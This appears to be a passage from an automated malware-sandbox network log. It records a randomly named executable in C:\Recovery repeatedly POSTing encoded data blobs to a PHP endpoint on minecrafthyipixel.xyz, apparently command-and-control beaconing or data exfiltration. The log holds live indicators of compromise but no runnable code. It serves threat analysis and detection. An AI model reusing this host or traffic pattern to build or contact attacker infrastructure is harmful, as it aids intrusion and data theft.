                                                                                                                                    Apr 19, 2024 13:43:56.267438889 CEST | 2512 | OUT | Data Raw: 52 5e 5b 5e 59 41 54 5e 5c 5e 59 59 57 53 58 5c 54 57 5f 59 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[^YAT^\^YYWSX\TW_YTZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>>V6(]' '[0W>8 19(U2*#2W>;'] /?-$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:56.525645018 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:56 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=op9OTksQMyJFx5fRKiKQfEP8P8eTf13OCSSiNyw6TrqbqQUkWLgv4ViwGN0y4F53GDrXBA5BlYHu71VaVR8f3IdbJou1sJbbyq7kMN3Nv5%2B8zoEaaB2X8qvu6ssu7jiAL%2BFjg9sikN8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3c85d49b085-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:56.525708914 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    128 | 192.168.2.4 | 49880 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:56.748488903 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:56.853125095 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:56.853269100 CEST | 2512 | OUT | Data Raw: 57 5a 5e 58 59 47 54 58 5c 5e 59 59 57 50 58 5e 54 5b 5f 5c 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^XYGTX\^YYWPX^T[_\TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>6U!X'\31=^ '*0V1;*41=);;] /?-$[. X
Apr 19, 2024 13:43:57.207695961 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abwt77A4Cz4Qo8DHI0PdSStkMd2RO2mHLeTbdRIt%2F6kdCnGidjgjNS76OFyr42kngm7ceHOTQ%2FZmeyJCUf%2FddDebVa%2BnUwa%2FzwkZLsu%2BujHpGCOog3k2ZQMICMPMVrXtgIsF7VSyuxw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3cc0a85add7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:57.207758904 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.4 | 49881 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:57.473728895 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:57.578998089 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:57.579149961 CEST | 2512 | OUT | Data Raw: 52 5a 5e 59 5c 40 51 5f 5c 5e 59 59 57 52 58 59 54 5a 5f 58 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^Y\@Q_\^YYWRXYTZ_XT]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%=*V!7$#$%+Q*Y%V%;)7T2)+/\7[-$[. X 1
Apr 19, 2024 13:43:57.841645956 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJ3xoChPYNgEGc2coMnoDpwF8Sz2UxN3UxF0JsrYUiHg3GajUE9grE9fU47qUSWWS0l7rffKp%2B70uDD9Ramni3rb4ZNfxl3nkic4OiMxFz8ceLJUakxqijYTSvfxXiTzq%2BL6kQfQd3g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d088217bb2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:57.841713905 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.4 | 49882 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:58.070297956 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:58.174756050 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:58.174902916 CEST | 2512 | OUT | Data Raw: 57 5b 5e 5e 5c 40 51 5e 5c 5e 59 59 57 52 58 5f 54 57 5f 5f 54 5a 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^^\@Q^\^YYWRX_TW__TZS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'.)64Y'07%;.=#X&90R2.S 2&=8 ,<].5$[. X 1
Apr 19, 2024 13:43:58.448049068 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5QscywSdPhoaoDuYJwVCLsZ0SoFyZuRBtMzQ15eXayNSgsnfjyHr3fbq8O73oqT8gaps1XN8oyKPtLIpHgY5FLPZqVkK5cfm3s17h5LXYGvvJ4f%2BBCAuMpcFgXqbojHHMGHzTg%2Frjo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d44d701399-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:58.448141098 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.4 | 49883 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:58.675501108 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:58.780447006 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:58.780755997 CEST | 2512 | OUT | Data Raw: 57 5b 5b 5c 59 44 51 5d 5c 5e 59 59 57 52 58 5a 54 50 5f 5f 54 5c 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YDQ]\^YYWRXZTP__T\S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2=!((Y'043;*;7&<S%. 2&Q>;[7<$\.%$[. X 1
Apr 19, 2024 13:43:59.039083004 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orK6%2ByT%2BUD3BL8tcz2WJfJsaPYvwgNTbRxuexYh%2FMLd3sMuqLrcqTiumMo58SwxTyOvEh6LxkKJuuyilmFPukaqgDL6r45ERuRd0ttsXx42VJxTcYTTMD652g7D2vj4EDDKhujuaIwc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3d80d5d6741-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:59.039145947 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.4 | 49884 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:59.269053936 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:59.374207020 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:59.374496937 CEST | 2512 | OUT | Data Raw: 52 5a 5b 5f 59 42 51 58 5c 5e 59 59 57 52 58 52 54 50 5f 5d 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[_YBQX\^YYWRXRTP_]T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%> (#' 'P>^(29(%+.R#1*;/[4Z3:$[. X 1
Apr 19, 2024 13:43:59.648622990 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:59 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIQuTKjQU6oJAttduLdYbfVN%2BCzJAYRqDJ%2FTSxZinDRtrqElocEdCQfpZASRZLPmmZtHnxH7ckYXUc5kqTJ4ETqKk1Ls2Wipy6gBzQCpeD%2FoXC8Ii3b3QhSbaDFkdvlowzwxwbn%2BM8E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3dbc8ab1d70-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:59.648686886 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.4 | 49885 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:59.873846054 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:59.978487968 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:59.978645086 CEST | 2512 | OUT | Data Raw: 52 5d 5e 5b 59 4b 51 5f 5c 5e 59 59 57 51 58 5c 54 5b 5f 57 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[YKQ_\^YYWQX\T[_WTYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z1=15(73#7\'+-=(]2)8U%("Q#"++4? [.%$[. X =
Apr 19, 2024 13:44:00.324489117 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2BCwEyZnonOv7ADPpxG3yP3sGoOLJLXaZ%2BXLZs0OjcMRuSH0rqh5T7%2FPgW25dt805nV9XTilUITnH1lizN4f1vQtcU9NeC%2BYijpAum2YJ2m2CrjqByZCIgHWtYBAGLTD5i%2BuwiyBBVs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3df89d007ba-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:00.324687958 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     134 | 192.168.2.4 | 49886 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:00.546367884 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:44:00.650974035 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:44:00.651326895 CEST | 2500 | OUT | Data Raw: 57 5b 5b 5c 59 42 54 5f 5c 5e 59 59 57 57 58 5b 54 5b 5f 5d 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YBT_\^YYWWX[T[_]T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%!+([3(';!>2 S%!7T"U), <\.5$[. X
                                                                                                                                     Apr 19, 2024 13:44:01.054461956 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1%2FeBSKZApXC5mWhhVLkjB2YSxDZ2WpPPysCa5xmBcDvGOl%2F1vNQ9BuGmvw5Vs5umrhDFGOFIUFwjJ3yNBogF8P2fpSsF2yAyQjrHJR6sIkCcTikxiqMTNI4Za3sVMcHcvRg5toTnS4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3e3cc155083-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:01.054526091 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     135 | 192.168.2.4 | 49888 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:01.289743900 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:44:01.394599915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:44:01.394872904 CEST | 2512 | OUT | Data Raw: 57 58 5e 5d 5c 44 54 5f 5c 5e 59 59 57 53 58 5d 54 50 5f 59 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^]\DT_\^YYWSX]TP_YTUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'.="+?0?]$)>(')28)7)>+'Z7^-%$[. X 5
                                                                                                                                     Apr 19, 2024 13:44:01.656838894 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4vThcjH8mnW2fDtdIkKybE0I7vukCsIz%2FlZaJodWyJpVZHtLYyLdHhYokeneaGHE9mcRp6%2B%2FdfRpUTmHzSreUAp0UokFIE%2BWjkKvMYAxvbkTbAO7C5Ug9Jyb66BH55T4Y%2FlEbyfJZA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3e86e65b0e5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:01.656903028 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     136 | 192.168.2.4 | 49889 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:01.888573885 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                     Apr 19, 2024 13:44:01.993664980 CEST | 25 | IN | HTTP/1.1 100 Continue
